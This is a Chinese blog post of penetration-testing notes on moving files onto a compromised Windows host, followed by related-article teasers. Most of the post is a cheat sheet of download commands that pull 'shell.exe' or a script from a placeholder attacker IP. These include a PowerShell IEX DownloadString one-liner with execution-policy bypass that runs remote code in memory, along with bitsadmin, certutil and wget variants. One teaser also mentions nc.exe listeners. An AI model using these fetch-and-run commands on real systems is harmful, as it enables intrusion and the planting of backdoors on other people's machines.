渗透中的文件上传与下载

最新推荐文章于 2024-11-11 16:00:21 发布
最新推荐文章于 2024-11-11 16:00:21 发布
阅读量294 收藏 3
点赞数 10
分类专栏: Web 文章标签: 安全 笔记 面试 web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_64481831/article/details/141932993
版权

有时候拿下一台机器的控制权,需要在这台主机上传一些东西;有时候也会碰到不能直接上传只能通过命令行执行的shell,这就需要将shell下载下来。

目录

利用powershell进行文件上传下载

利用bitsadmin命令进行文件下载

利用certutil命令上传下载文件

利用wget命令上传下载文件

利用powershell进行文件上传下载

# 下载脚本并在内存中执行
powershell -nop -exec bypass -c "IEX(New-Object Net.WebClient).DownloadString('http://xxx.xxx.xxx.xxx/xxx.ps1')"  

# 下载文件到指定目录
powershell (new-object system.net.webclient).downloadfile('http://xxx.xxx.xxx.xxx/shell.exe','d:/test.exe')
 
# 下载文件到当前目录
powershell (new-object system.net.webclient).downloadfile('http://xxx.xxx.xxx.xxx/test.exe','test.exe')

利用bitsadmin命令进行文件下载

bitsadmin是Windows自带工具(Windows7之后),可以用来进行文件下载,Windows的自动更新和补丁之类下载就是用这个工具来实现的。而且bitsadmin可以在网络不稳定的状态下下载文件,出错会自动重新加载重试。

如下命令,将位于外网文件下载到目标主机上

bitsadmin /transfer <任务名> <remote_url> <local_name>

bitsadmin /transfer shell http://xxx.xxx.xxx.xxx/shell.exe c:\users\tester\shell.exe    
 
// 保存文件的文件路径必须是已经存在的有权限的目录,否则不能下载。

加载速度过慢也可以设置任务优先级

先执行:
start bitsadmin /transfer <任务名> http://xxx.xxx.xxx.xxx/shell.exe c:\users\tester\shell1.exe
再执行:
bitsadmin /setpriority <对应任务名> foreground

利用certutil命令上传下载文件

在Windows7及其以后的机器都可以使用,但该命令容易被杀软查杀。

certutil -urlcache -split -f http://xxx.xxx.xxx.xxx/shell.exe c:/users/tester/shell.exe // 下载文件到指定目录下

利用wget命令上传下载文件

wget -O c:/users/tester/shell.exe http://xxx.xxx.xxx.xxx/shell.exe // 下载文件到指定目录并指定了文件
wget -P c:/users/tester/ http://xxx.xxx.xxx.xxx/shell.exe // 下载文件到指定目录下

!!!!!!!!!!!!!!!!.
关注
专栏目录
web渗透文件上传漏洞知识总结
IerkeU的博客
12-20 3149
一、文件上传漏洞思路: 第一步: 首先看间件:因为第一步看间件就是确定是否存在解析漏洞(学习整理几种解析漏洞的对应版本,有些低版本有解析漏洞,有些高版本就没有。)间件版本确定了,解析漏洞就确定了,有些解析漏洞只要有上传点就能实现提权,有些会受到权限就不行 第二步: 然后有了解析漏洞,我们就要找文件上传来配合。 scan字典扫描(就通过网站字典扫描) 会员心(这种很有可能是文件上传的地方) 扫描后去到验证/绕过的环节,判断验证方式:...
CS的下载+内网穿透
hellodaoyan的博客
05-31 831
NC连接后没有任何回显先受控房 nc.exe -l -p 12345然后攻击方 nc.exe ip port 12345扫描端口上传和 nc.exe 同一目录下的文件。
用Powershell下载文件
fxp007的专栏
03-28 1465
<br /> <br />从一个文件[listfile]读取每一个url,下载页面之后分析其的真实下载地址并下载该文件<br /> <br />$WebClient = New-Object System.Net.WebClient $info = get-content [listfile] $Reg= [regexp] foreach ($i in $info) { $Results = $WebClient.DownloadString($i) $Results -match $Reg
【网络安全渗透】常见文件上传漏洞处理与防范
景天科技苑
03-12 1854
文件上传漏洞是指由于程序员未对上传的文件进行严格的验证和过滤,而导致的用户可以越过其本身权限 向服务器上传可执行的动态脚本文件。如常见的头像上传,图片上传,oa 办公文件上传,媒体上传,允许 用户上传文件,如果过滤不严格,恶意用户利用文件上传漏洞,上传有害的可以执行脚本文件到服务器, 可以获取服务器的权限,或进一步危害服务器。
web渗透文件上传漏洞
qinshuoyang1的博客
07-19 3986
文件上传漏洞可以说是日常渗透测试用得最多的一个漏洞,用它获得服务器权限最快最直接。在Web程序,经常需要用到文件上传的功能。如用户或者管理员上传图片,或者其它文件。如果没有限制上传类型或者限制不严格被绕过,就有可能造成文件上传漏洞。如果上传了可执行文件或者网页脚本,就会导致网站被控制甚至服务器沦陷。,复杂一点的情况是配合 Web Server的解析漏洞来获取控制权或结合文件包含漏洞。......
内网渗透--上传与下载
Beret-81的博客
11-30 1351
内网渗透--上传与下载内网渗透–上传与下载使用bitsadmin 进行下载使用powershell 进行下载使用 certutil 进行下载使用 WGET 进行下载 内网渗透–上传与下载 对于不用直接上传而且只能通过命令行执行的shell,我们可以通过以下的方法对文件进行上传和下载。 使用bitsadmin 进行下载 下载命令:bitsadmin /transfer n http://172.16.12.128/NC.exe E:\nc.exe 使用powershell 进行下载 本地下载:power
Web渗透文件上传漏洞
WolvenSec的博客
06-23 867
这段代码的主要功能是通过检查文件扩展名,确保用户上传的文件符合预期(["jpg","png","gif"];)的格式要求。如果文件的扩展名不在允许的列表,用户将看到一个警告消息,并且页面会重新加载。
渗透测试——六、网站漏洞——文件上传
钟言的博客
12-06 9529
本篇是学习渗透测试的第六课,网络漏洞之文件上传漏洞,详细内容包含了:文件包含 PHP伪协议、文件上传四、文件包含页面之包含测试五、文件上传页面之上传测试等等,
渗透之文件系统+上传下载文件
qq_51550750的博客
06-27 1708
MSF后渗透 文件系统,文件的上传和下载
渗透测试之文件上传
Zane·S的博客
05-06 1183
文件上传漏洞的介绍 如何利用文件上传漏洞 JS检测绕过攻击 文件后缀绕过攻击 文件类型绕过攻击 文件截断绕过攻击 竞争条件攻击
web-渗透-文件上传漏洞专题靶场.rar
03-14
本靶场为二十一个关于文件上传漏洞的环境,从前端绕过、服务器绕过、木马图上传绕过、截断绕过、竞争条件等等几乎包含目前所有的文件上传漏洞类型,刷完即掌握文件上传漏洞的所有要点。 文件打包了所需的所有环境...
文件上传渗透从小白到精通
06-23
文件上传渗透是网络安全领域常见的攻击手段之一,它主要针对Web应用程序存在的安全漏洞。Web应用程序通常为用户提供文件上传功能,允许用户上传各种文件类型如文档、图片、视频等。然而,若Web应用程序在安全...
文件上传漏洞——渗透day11
qq_62716256的博客
09-09 709
文件上传漏洞——渗透day11
渗透测试-文件上传
SK1ng的博客
09-25 745
文件上传 文件上传漏洞 服务器配置不当,导致任意文件上传 Web应用开启文件上传功能,但没有对文件进行足够的限制 危害 该漏洞可导致攻击者上传任意文件,包括恶意脚本、程序等。如果Web服务器所保存上传文件的可写目录具有执行权限,则可以上传后门文件getshell 条件 Web服务器开启上传功能,且接口对外开放 Web用户对目标目录具有可写权限,甚至执行权限 Web间件可以解析上传的脚本 验证/绕过 前端验证 JS类防护 如: <script type="text/javascript"&g
AI与隐私:Facebook如何在数据保护平衡创新与安全
2301_78954254的博客
11-07 637
在快速发展的数字时代,人工智能(AI)技术的应用正在为社交媒体平台带来前所未有的创新。然而,伴随着技术的进步,用户的隐私保护问题也愈加凸显。作为全球最大的社交网络之一,Facebook在推动AI技术应用的同时,必须面对如何在数据保护实现创新与安全的平衡。本文将探讨Facebook在这一领域的策略和实践。
FileLink跨网文件安全摆渡系统——企业数据流转的安全桥梁
最新发布
weixin_44264342的博客
11-11 668
随着企业信息化建设的不断推进,跨网文件传输的需求日益增长,FileLink跨网文件安全摆渡系统通过全方位的安全保障与高效传输能力,成为企业解决跨网文件传输难题的理想选择。无论是对数据的加密保护、权限管理、合规审计,还是对传输效率的优化,FileLink都能够提供全面的解决方案,确保文件在内外网之间的安全、高效流转。如果您的企业正面临跨网文件传输的挑战,不妨选择FileLink,让它成为您企业数据流转的安全桥梁,助力企业信息流通的高效性和安全性,为您的业务发展保驾护航。
微软日志丢失事件敲响安全警钟
juminfo的博客
11-08 392
据报告,从9月2日至9月19日,持续长达两周的时间里,微软的多项核心云服务,包括身份验证平台Microsoft Entra、安全信息与事件管理(SIEM)平台Sentinel、云安全解决方案Defender for Cloud以及数据目录服务Purview,都经历了安全日志记录的空白期。系统可以实时、不间断地收集并整合各类设备的日志信息,通过先进的关联分析技术和机器学习手段,助力用户从庞杂的日志数据快速识别异常安全事件,全面满足合规审计、分析调查及数据留存等多日志场景使用需求。
信息安全工程师(82)操作系统安全概述
m0_73399576的博客
11-08 1225
信息安全工程师——操作系统安全概述篇
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值